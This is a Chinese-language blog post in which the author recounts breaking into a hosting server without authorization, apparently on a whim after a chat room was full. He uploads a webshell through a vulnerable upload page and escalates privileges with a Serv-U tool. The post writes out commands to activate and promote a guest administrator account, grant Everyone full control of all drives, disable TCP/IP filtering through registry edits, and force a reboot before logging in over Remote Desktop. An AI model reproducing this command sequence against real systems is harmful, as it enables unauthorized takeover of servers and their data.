從上傳webshell到突破TCP/IP篩選到3389終端登陸

LvHuaNa
一：得到webshell
今天晚上的一次小小測試，由於本人太菜，再高深的技術我也不會，只能這樣了..........
一切都已經過去了，沒有辦法補圖了，希望能看的懂這個小文章。
今天有是無聊的一天，晚上實在無聊沒有事情幹，就到一個視訊交談網站看秀，嘿嘿~
突然發現一個聊天室特別的火暴，人數已經有500人在裡面了（滿員了），刷了n次也沒有進去..........更加鬱悶了！：（
想想反正也是沒有事情做，測試一下主機安全做的怎麼樣吧，呵呵（太菜，說測試人家安全實在是抬高自己了）
在cmd下ping了一下得到了對方的ip，然後登陸http://whois.webhosting.info/對方ip看看有沒有其他的網站，哈，這下發了，上面有幾十個網站，估計我還是能找到一個兩個帶漏洞的網站的`
經過漫長的尋找，終於找到一個動易帶漏洞的頁面http://www.xxxx.net/Upfile_Soft.asp，上傳一個webshell（海陽2005正式版）先（怎麼上傳我就不羅嗦了，上傳工具現在漫天飄了）。

二：成功提升許可權建立使用者
拿到webshell後高高興興的登陸了，突然發現什麼許可權都沒有，只能在自己的webshell所在的目錄裡面打轉（c.d.e.f盤都瀏覽不了），連刪除檔案的許可權都沒有，鬱悶呀........
回到〖Server〗下看看主機開了什麼服務吧，經過發現他開了終端服務和serv-u服務，哈，這下有搞頭了^_^用superscan掃描了一下他的ip，果然通過banner看出他是用的serv-u，版本5.0。
到〖Wscript.Shell〗下面試試看能執行cmd命令不能，輸入net user後沒有反映，再試通過Wscript.Shell能執行cmd命令不能，再次輸入net user後執行返回了對方的user名單，哈哈，這下好了，能拿下了！！
上傳serv-u提升工具到D:/a004/tggtwe/****.com/UploadSoft目錄下面，改名為：test.exe，然後回到〖Wscript.Shell〗下執行命令去了，嘿嘿，馬上一隻肥雞就要到手了，高興ing~
通過Wscript.Shell執行cmd命令：
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net user guest /active:yes" #啟用guest帳號，我喜歡用這個帳號
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net user guest lvhuana" #把guest帳號的密碼設定為lvhuana
D:/a004/tggtwe/****.com/UploadSoft/test.exe "net localgroup administrators guest /add" #提升guest許可權到admin許可權
好了，帳號建立完畢，執行一下net localgroup administrators看看成功沒，通過回顯知道添加成功了。然後執行netstat -an後看到他開的終端連接埠是預設的3389，OK，串連試試~

三：解決TCP/IP篩選
串連不上！？暈...........再拿出superscan來掃一下他的3389，根本掃不到........（開了防火牆！？靠，我的點真背.....）
沒有辦法了，再次回到Wscript.Shell執行cmd命令：
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe c: /e /t /g everyone:F" #把c盤設定為everyone可以瀏覽
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe d: /e /t /g everyone:F" #把d盤設定為everyone可以瀏覽
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe e: /e /t /g everyone:F" #把e盤設定為everyone可以瀏覽
D:/a004/tggtwe/****.com/UploadSoft/test.exe "cacls.exe f: /e /t /g everyone:F" #把f盤設定為everyone可以瀏覽
這下最少可以遍曆整個硬碟了，我在硬碟裡面到處的翻，找遍了也沒有找到他的防火牆檔案，這下心裡有數了，肯定是他進行TCP/IP篩選了！（當然也有是內網做伺服器的可能，具體大家自己可以根據ipconfig -all來判斷）
突破TCP/IP篩選我們可以更改他的註冊表來實現，我們要做的就是匯出他註冊表的三處，更改後再匯入就可以了，回到〖Wscript.Shell〗執行cmd命令：
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip" #匯出註冊表裡關於TCP/IP篩選的第一處
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip" #匯出註冊表裡關於TCP/IP篩選的第二處
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -e D:/a004/tggtwe/****.com/UploadSoft/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip" #匯出註冊表裡關於TCP/IP篩選的第三處
然後回到〖Stream〗或〖FSO〗發現1.reg,2.reg,3.reg已經安靜的躺在那裡了，嘿嘿~
把1.reg,2.reg,3.reg下載回來到自己的硬碟裡面編輯一下，把關於TCP/IP篩選的幾個地方改一下，首先開啟1.reg找到"EnableSecurityFilters"=dword:00000001把最後面的數字1改成0後儲存，然後更改2.reg,3.reg，更改方法一樣，我就不再羅嗦了~
然後我們把1.reg,2.reg,3.reg再上傳回對方的機器裡面（這裡我們要選上覆蓋模式，因為沒有許可權刪除原來的1.reg,2.reg,3.reg），上傳成功後再回到〖Wscript.Shell〗執行cmd命令：
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/1.reg" #安靜模式下把我們修改完的1.reg匯入到他的註冊表
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/2.reg" #安靜模式下把我們修改完的2.reg匯入到他的註冊表
D:/a004/tggtwe/****.com/UploadSoft/test.exe "regedit -s D:/a004/tggtwe/****.com/UploadSoft/3.reg" #安靜模式下把我們修改完的3.reg匯入到他的註冊表
OK！匯入後重新啟動他的機器後在能解決TCP/IP篩選問題，再在〖Wscript.Shell〗執行cmd命令：
D:/a004/tggtwe/****.com/UploadSoft/test.exe "iisreset /reboot /timeout:00" #利用他自身的iis服務來重新啟動他的機器，/timeout:00這個參數是讓他立即重新啟動
執行完後我們再用superscan已經掃不到他了，吼吼~已經重新啟動了！

四：成功用終端登陸
經過漫長的等待後（其即時間不長，只是我在這裡已經等不及了，嘿嘿~），終於可以用superscan掃到他了，並且可以掃到他的3389連接埠了，哈哈，終於成功了，拿出終端登陸器順利的用我剛才建立的user：guest，pass：lvhuana登陸上了！
好了，這篇垃圾文章到此就該結束了，已經淩晨了，也該收工睡覺了~由於本人太菜，錯誤地方肯定在所難免，讓大家見笑了，同時望大家指正！
（如有轉載請帶上作者資訊，寫的不容易，這麼長.............）